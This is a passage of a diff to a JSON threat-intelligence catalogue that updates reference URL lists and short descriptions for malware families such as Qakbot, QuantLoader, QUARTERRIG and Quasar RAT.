"https://securelist.com/qakbot-technical-analysis/103931/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", - "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", - "https://www.youtube.com/watch?v=4I0LF8Vm7SI", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://www.malwarology.com/posts/4-qakbot-api-hashing/", - "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", + "https://experience.mandiant.com/trending-evil/p/1", "https://www.circl.lu/pub/tr-64/", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", - "https://www.group-ib.com/blog/prolock_evolution", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://hatching.io/blog/reversing-qakbot", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", - "https://blog.quosec.net/posts/grap_qakbot_navigation/", - "https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction", - "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", - "https://blog.quosec.net/posts/grap_qakbot_strings/", - "https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/", - "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", - "https://www.um.edu.mt/library/oar/handle/123456789/76802", - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", - "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", - "https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841", - "https://www.intrinsec.com/egregor-prolock/", - "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4", - "https://twitter.com/redcanary/status/1334224861628039169", - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://www.malwarology.com/posts/3-qakbot-process-injection/", - "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga", - "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html", - "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", - "https://twitter.com/ChouchWard/status/1405168040254316547", - "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm", - "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", - "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a", + "https://hatching.io/blog/reversing-qakbot", + "https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php", + "https://www.elastic.co/de/security-labs/qbot-malware-analysis", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/", + "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.malwarology.com/posts/2-qakbot-conf-extraction/", + "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", + "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://bin.re/blog/the-dga-of-qakbot/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/", + "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", + "https://blog.group-ib.com/prometheus-tds", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot", + "https://www.secureworks.com/blog/law-enforcement-takes-down-qakbot", + "https://www.team-cymru.com/post/visualizing-qakbot-infrastructure", + "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.spamhaus.org/news/article/819/qakbot-the-takedown-and-the-remediation", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", + "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/TheDFIRReport/status/1361331598344478727", + "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", + "https://web.archive.org/web/20151026140427/https://www.symantec.com/security_response/writeup.jsp?docid=2009-050707-0639-99", "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta", - "https://malwareandstuff.com/upnp-messing-up-security-since-years/", - "https://asec.ahnlab.com/en/44662/", - "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/", - "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", - "https://isc.sans.edu/diary/rss/26862", - "https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/", - "https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature", - "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", - "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails", - "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bitsight.com/blog/emotet-botnet-rises-again", + "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://web.archive.org/web/20110909041410/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-i", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://blog.lumen.com/qakbot-retool-reinfect-recycle/", + "https://www.elastic.co/security-labs/qbot-configuration-extractor", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/", + "https://www.youtube.com/watch?v=OCRyEUhiEyw", + "https://www.malwarology.com/posts/4-qakbot-api-hashing/", + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/", + "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", + "https://www.group-ib.com/blog/egregor", + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/", + "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", + "https://twitter.com/Corvid_Cyber/status/1455844008081641472", + "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", + "https://isc.sans.edu/diary/rss/28728", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.malwarology.com/posts/3-qakbot-process-injection/", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory", + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/", + "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html", + "https://www.um.edu.mt/library/oar/handle/123456789/76802", + "http://blog.opensecurityresearch.com/2011/12/intro-to-reversing-w32pinkslipbot.html", + "https://www.youtube.com/watch?v=iB1psRMtlqg", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view", + "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/", + "https://twitter.com/kienbigmummy/status/1460537501676802051", + "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/", + "https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", + "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html", + "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", + "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", + "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/", + "https://malwareandstuff.com/upnp-messing-up-security-since-years/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://www.justice.gov/d9/2023-08/23mj4251_application_redacted.pdf", + "https://web.archive.org/web/20130530033754/http://www.symantec.com/connect/blogs/qakbot-steals-2gb-confidential-data-week", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://securelist.com/qakbot-technical-analysis/103931/", + "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan", + "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", + "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://sansorg.egnyte.com/dl/ALlvwK6fp0", + "https://asec.ahnlab.com/en/44662/", + "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", + "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/", + "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", + "https://blog.quosec.net/posts/grap_qakbot_navigation/", + "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", + "https://github.com/prodaft/malware-ioc/blob/master/PTI-66/DarkGate.md", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", + "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot", + "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://twitter.com/Unit42_Intel/status/1461004489234829320", + "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", + "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", + "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm", + "https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html", + "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html", + "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", + "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://isc.sans.edu/diary/rss/26862", + "https://krebsonsecurity.com/2023/08/u-s-hacks-qakbot-quietly-removes-botnet-infections/", + "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies", + "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", + "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", + "https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps", + "https://www.youtube.com/watch?v=4I0LF8Vm7SI", + "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", + "https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/", + "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://twitter.com/ChouchWard/status/1405168040254316547", + "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", + "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", + "https://embee-research.ghost.io/shodan-censys-queries/", + "https://blog.quosec.net/posts/grap_qakbot_strings/", + "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/", + "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/", + "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/", + "https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis", + "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://syrion.me/malware/qakbot-bb-extractor/", + "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://www.group-ib.com/blog/prolock_evolution", + "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html", + "https://web.archive.org/web/20110406012907/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-ii", + "https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/", + "https://d01a.github.io/pikabot/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails", + "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", + "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources", + "https://www.malwarology.com/2022/04/qakbot-series-process-injection/", + "https://blog.talosintelligence.com/following-the-lnk-metadata-trail", + "https://twitter.com/_alex_il_/status/1384094623270727685", + "https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature", + "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", + "https://twitter.com/elisalem9/status/1381859965875462144", + "https://www.intrinsec.com/egregor-prolock/", + "https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841", + "https://github.com/0xThiebaut/PCAPeek/", + "https://web.archive.org/web/20120206174705/http://blogs.rsa.com/rsafarl/businesses-beware-qakbot-spreads-like-a-worm-stings-like-a-trojan/", + "https://www.justice.gov/usao-cdca/pr/qakbot-malware-disrupted-international-cyber-takedown", + "https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/", - "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs" + "https://twitter.com/tylabs/status/1462195377277476871", + "https://www.youtube.com/watch?v=M22c1JgpG-U", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", + "https://www.shadowserver.org/news/qakbot-botnet-disruption/", + "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb", + "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf", + "https://isc.sans.edu/diary/rss/28568", + "https://isc.sans.edu/diary/rss/28448", + "https://twitter.com/embee_research/status/1592067841154756610?s=20", + "http://contagiodump.blogspot.com/2010/11/template.html", + "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://www.elastic.co/security-labs/qbot-malware-analysis", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", + "https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction", + "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4", + "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros", + "https://www.secureworks.com/research/threat-profiles/gold-lagoon", + "https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html", + "https://www.justice.gov/d9/2023-08/23mj4244_application_redacted.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", + "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/", + "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", + "https://www.youtube.com/watch?v=gk7fCC5RiAQ", + "https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in-multinational-cyber-takedown", + "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/", + "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf" ], "synonyms": [ "Oakboat", @@ -39621,15 +41473,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", - "https://twitter.com/Arkbird_SOLG/status/1458973883068043264", - "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://twitter.com/Arkbird_SOLG/status/1458973883068043264", + "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://intel471.com/blog/a-brief-history-of-ta505" ], "synonyms": [], "type": [] @@ -39637,85 +41489,103 @@ "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", "value": "QuantLoader" }, + { + "description": "A stager used by APT29 to download and run CobaltStrike.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf", + "https://www.gov.pl/attachment/6f51bb1a-3ad2-461c-a16d-408915a56f77" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ef29604c-1fc8-4f3f-9342-dbb28bb1bd5b", + "value": "QUARTERRIG" + }, { "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://asec.ahnlab.com/en/31089/", - "https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", - "https://intel471.com/blog/privateloader-malware", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", - "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://blog.reversinglabs.com/blog/rats-in-the-library", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", - "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", - "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/", - "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934", - "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - 